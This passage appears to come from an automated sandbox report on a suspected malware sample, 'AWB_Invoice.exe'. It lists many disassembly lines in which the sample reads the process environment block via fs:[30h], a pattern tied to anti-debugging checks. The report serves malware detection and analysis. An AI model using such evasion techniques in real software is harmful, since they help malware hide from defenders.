      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35849723 mov eax, dword ptr fs:[00000030h]4_2_35849723
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A174B mov eax, dword ptr fs:[00000030h]4_2_358A174B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A174B mov ecx, dword ptr fs:[00000030h]4_2_358A174B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35853740 mov eax, dword ptr fs:[00000030h]4_2_35853740
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585174A mov eax, dword ptr fs:[00000030h]4_2_3585174A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov ecx, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35842755 mov eax, dword ptr fs:[00000030h]4_2_35842755
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585A750 mov eax, dword ptr fs:[00000030h]4_2_3585A750
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F75B mov eax, dword ptr fs:[00000030h]4_2_3581F75B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CE750 mov eax, dword ptr fs:[00000030h]4_2_358CE750
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35832760 mov ecx, dword ptr fs:[00000030h]4_2_35832760
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861763 mov eax, dword ptr fs:[00000030h]4_2_35861763
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35850774 mov eax, dword ptr fs:[00000030h]4_2_35850774
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35824779 mov eax, dword ptr fs:[00000030h]4_2_35824779
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35824779 mov eax, dword ptr fs:[00000030h]4_2_35824779
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF68C mov eax, dword ptr fs:[00000030h]4_2_358DF68C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35830680 mov eax, dword ptr fs:[00000030h]4_2_35830680
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35828690 mov eax, dword ptr fs:[00000030h]4_2_35828690
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589D69D mov eax, dword ptr fs:[00000030h]4_2_3589D69D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AC691 mov eax, dword ptr fs:[00000030h]4_2_358AC691
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E86A8 mov eax, dword ptr fs:[00000030h]4_2_358E86A8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E86A8 mov eax, dword ptr fs:[00000030h]4_2_358E86A8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358206CF mov eax, dword ptr fs:[00000030h]4_2_358206CF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358EA6C0 mov eax, dword ptr fs:[00000030h]4_2_358EA6C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358C86C2 mov eax, dword ptr fs:[00000030h]4_2_358C86C2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584D6D0 mov eax, dword ptr fs:[00000030h]4_2_3584D6D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358196E0 mov eax, dword ptr fs:[00000030h]4_2_358196E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358196E0 mov eax, dword ptr fs:[00000030h]4_2_358196E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358256E0 mov eax, dword ptr fs:[00000030h]4_2_358256E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358256E0 mov eax, dword ptr fs:[00000030h]4_2_358256E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358256E0 mov eax, dword ptr fs:[00000030h]4_2_358256E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358466E0 mov eax, dword ptr fs:[00000030h]4_2_358466E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358466E0 mov eax, dword ptr fs:[00000030h]4_2_358466E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589C6F2 mov eax, dword ptr fs:[00000030h]4_2_3589C6F2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589C6F2 mov eax, dword ptr fs:[00000030h]4_2_3589C6F2
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B3608 mov eax, dword ptr fs:[00000030h]4_2_358B3608
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584D600 mov eax, dword ptr fs:[00000030h]4_2_3584D600
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584D600 mov eax, dword ptr fs:[00000030h]4_2_3584D600
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF607 mov eax, dword ptr fs:[00000030h]4_2_358DF607
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585360F mov eax, dword ptr fs:[00000030h]4_2_3585360F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F4600 mov eax, dword ptr fs:[00000030h]4_2_358F4600
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CD62C mov ecx, dword ptr fs:[00000030h]4_2_358CD62C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CD62C mov ecx, dword ptr fs:[00000030h]4_2_358CD62C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CD62C mov eax, dword ptr fs:[00000030h]4_2_358CD62C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35825622 mov eax, dword ptr fs:[00000030h]4_2_35825622
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35825622 mov eax, dword ptr fs:[00000030h]4_2_35825622
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35827623 mov eax, dword ptr fs:[00000030h]4_2_35827623
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C620 mov eax, dword ptr fs:[00000030h]4_2_3585C620
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35820630 mov eax, dword ptr fs:[00000030h]4_2_35820630
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35850630 mov eax, dword ptr fs:[00000030h]4_2_35850630
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A8633 mov esi, dword ptr fs:[00000030h]4_2_358A8633
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A8633 mov eax, dword ptr fs:[00000030h]4_2_358A8633
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A8633 mov eax, dword ptr fs:[00000030h]4_2_358A8633
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585F63F mov eax, dword ptr fs:[00000030h]4_2_3585F63F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585F63F mov eax, dword ptr fs:[00000030h]4_2_3585F63F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35823640 mov eax, dword ptr fs:[00000030h]4_2_35823640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F640 mov eax, dword ptr fs:[00000030h]4_2_3583F640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F640 mov eax, dword ptr fs:[00000030h]4_2_3583F640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F640 mov eax, dword ptr fs:[00000030h]4_2_3583F640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C640 mov eax, dword ptr fs:[00000030h]4_2_3585C640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585C640 mov eax, dword ptr fs:[00000030h]4_2_3585C640
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581D64A mov eax, dword ptr fs:[00000030h]4_2_3581D64A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581D64A mov eax, dword ptr fs:[00000030h]4_2_3581D64A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35855654 mov eax, dword ptr fs:[00000030h]4_2_35855654
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582965A mov eax, dword ptr fs:[00000030h]4_2_3582965A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582965A mov eax, dword ptr fs:[00000030h]4_2_3582965A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585265C mov eax, dword ptr fs:[00000030h]4_2_3585265C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585265C mov ecx, dword ptr fs:[00000030h]4_2_3585265C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585265C mov eax, dword ptr fs:[00000030h]4_2_3585265C
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35817662 mov eax, dword ptr fs:[00000030h]4_2_35817662
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35817662 mov eax, dword ptr fs:[00000030h]4_2_35817662
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35817662 mov eax, dword ptr fs:[00000030h]4_2_35817662
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35833660 mov eax, dword ptr fs:[00000030h]4_2_35833660
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35833660 mov eax, dword ptr fs:[00000030h]4_2_35833660
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35833660 mov eax, dword ptr fs:[00000030h]4_2_35833660
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A166E mov eax, dword ptr fs:[00000030h]4_2_358A166E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A166E mov eax, dword ptr fs:[00000030h]4_2_358A166E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A166E mov eax, dword ptr fs:[00000030h]4_2_358A166E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585666D mov esi, dword ptr fs:[00000030h]4_2_3585666D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585666D mov eax, dword ptr fs:[00000030h]4_2_3585666D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585666D mov eax, dword ptr fs:[00000030h]4_2_3585666D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35820670 mov eax, dword ptr fs:[00000030h]4_2_35820670
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862670 mov eax, dword ptr fs:[00000030h]4_2_35862670
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862670 mov eax, dword ptr fs:[00000030h]4_2_35862670
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35824180 mov eax, dword ptr fs:[00000030h]4_2_35824180
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35824180 mov eax, dword ptr fs:[00000030h]4_2_35824180
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35824180 mov eax, dword ptr fs:[00000030h]4_2_35824180
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35849194 mov eax, dword ptr fs:[00000030h]4_2_35849194
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861190 mov eax, dword ptr fs:[00000030h]4_2_35861190
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35861190 mov eax, dword ptr fs:[00000030h]4_2_35861190
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585E1A4 mov eax, dword ptr fs:[00000030h]4_2_3585E1A4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585E1A4 mov eax, dword ptr fs:[00000030h]4_2_3585E1A4
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F51B6 mov eax, dword ptr fs:[00000030h]4_2_358F51B6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358531BE mov eax, dword ptr fs:[00000030h]4_2_358531BE
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358531BE mov eax, dword ptr fs:[00000030h]4_2_358531BE
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358541BB mov ecx, dword ptr fs:[00000030h]4_2_358541BB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358541BB mov eax, dword ptr fs:[00000030h]4_2_358541BB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358541BB mov eax, dword ptr fs:[00000030h]4_2_358541BB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358301C0 mov eax, dword ptr fs:[00000030h]4_2_358301C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358301C0 mov eax, dword ptr fs:[00000030h]4_2_358301C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358351C0 mov eax, dword ptr fs:[00000030h]4_2_358351C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358351C0 mov eax, dword ptr fs:[00000030h]4_2_358351C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358351C0 mov eax, dword ptr fs:[00000030h]4_2_358351C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358351C0 mov eax, dword ptr fs:[00000030h]4_2_358351C0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E81EE mov eax, dword ptr fs:[00000030h]4_2_358E81EE
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358E81EE mov eax, dword ptr fs:[00000030h]4_2_358E81EE
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582A1E3 mov eax, dword ptr fs:[00000030h]4_2_3582A1E3
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582A1E3 mov eax, dword ptr fs:[00000030h]4_2_3582A1E3
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582A1E3 mov eax, dword ptr fs:[00000030h]4_2_3582A1E3
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582A1E3 mov eax, dword ptr fs:[00000030h]4_2_3582A1E3
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582A1E3 mov eax, dword ptr fs:[00000030h]4_2_3582A1E3
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584B1E0 mov eax, dword ptr fs:[00000030h]4_2_3584B1E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584B1E0 mov eax, dword ptr fs:[00000030h]4_2_3584B1E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584B1E0 mov eax, dword ptr fs:[00000030h]4_2_3584B1E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584B1E0 mov eax, dword ptr fs:[00000030h]4_2_3584B1E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584B1E0 mov eax, dword ptr fs:[00000030h]4_2_3584B1E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584B1E0 mov eax, dword ptr fs:[00000030h]4_2_3584B1E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584B1E0 mov eax, dword ptr fs:[00000030h]4_2_3584B1E0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358291E5 mov eax, dword ptr fs:[00000030h]4_2_358291E5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358291E5 mov eax, dword ptr fs:[00000030h]4_2_358291E5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358181EB mov eax, dword ptr fs:[00000030h]4_2_358181EB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358191F0 mov eax, dword ptr fs:[00000030h]4_2_358191F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358191F0 mov eax, dword ptr fs:[00000030h]4_2_358191F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358301F1 mov eax, dword ptr fs:[00000030h]4_2_358301F1
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358301F1 mov eax, dword ptr fs:[00000030h]4_2_358301F1
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358301F1 mov eax, dword ptr fs:[00000030h]4_2_358301F1
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F1F0 mov eax, dword ptr fs:[00000030h]4_2_3584F1F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584F1F0 mov eax, dword ptr fs:[00000030h]4_2_3584F1F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584510F mov eax, dword ptr fs:[00000030h]4_2_3584510F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3582510D mov eax, dword ptr fs:[00000030h]4_2_3582510D
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581F113 mov eax, dword ptr fs:[00000030h]4_2_3581F113
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35850118 mov eax, dword ptr fs:[00000030h]4_2_35850118
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35857128 mov eax, dword ptr fs:[00000030h]4_2_35857128
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35857128 mov eax, dword ptr fs:[00000030h]4_2_35857128
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF13E mov eax, dword ptr fs:[00000030h]4_2_358DF13E
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358AA130 mov eax, dword ptr fs:[00000030h]4_2_358AA130
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B314A mov eax, dword ptr fs:[00000030h]4_2_358B314A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B314A mov eax, dword ptr fs:[00000030h]4_2_358B314A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B314A mov eax, dword ptr fs:[00000030h]4_2_358B314A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358B314A mov eax, dword ptr fs:[00000030h]4_2_358B314A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F5149 mov eax, dword ptr fs:[00000030h]4_2_358F5149
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581A147 mov eax, dword ptr fs:[00000030h]4_2_3581A147
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581A147 mov eax, dword ptr fs:[00000030h]4_2_3581A147
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581A147 mov eax, dword ptr fs:[00000030h]4_2_3581A147
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F3157 mov eax, dword ptr fs:[00000030h]4_2_358F3157
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F3157 mov eax, dword ptr fs:[00000030h]4_2_358F3157
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F3157 mov eax, dword ptr fs:[00000030h]4_2_358F3157
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585415F mov eax, dword ptr fs:[00000030h]4_2_3585415F
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585716D mov eax, dword ptr fs:[00000030h]4_2_3585716D
